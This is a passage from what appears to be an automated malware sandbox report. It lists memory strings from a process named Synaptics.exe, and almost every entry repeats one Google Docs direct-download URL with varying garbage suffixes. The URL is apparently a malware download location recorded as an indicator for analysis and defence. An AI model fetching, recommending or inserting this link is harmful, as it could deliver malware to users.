                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2445635497.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;;
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;E
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;S:
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=H
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?6
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?Wr
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?n
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA7
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAX
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAo
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005AAA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB6
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB9
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBD
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBWy
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBn#
                              Source: Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBz
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC:
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCR
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCo
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000071F6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2759091660.000000000EF58000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1610949341.0000000007203000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD9
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDQ%
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDZ
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE#
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEG
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEU$
                              Source: Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFE
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFF
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFT
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG5
                              Source: Synaptics.exe, 00000003.00000002.2759091660.000000000EF58000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd5
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.cn
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.com
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade9
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeZ
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadec
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloader
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf8
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfG
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfPG
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfY
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfev
                              Source: Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfx-
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                              Source: Synaptics.exe, 00000003.00000002.2445635497.00000000007BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgA
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgF
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgTF
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgl
                              Source: Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgp
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgs
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgv
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000071F6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2759091660.000000000EF58000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh9
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhQI
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhZ
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhi
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi#
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiG
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiUH
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005AAA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjD
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjF
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjI
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjTK
                              Source: Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjzQ
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk5
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000071F6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2759091660.000000000EF58000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl%E
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl4
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlI
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle.co
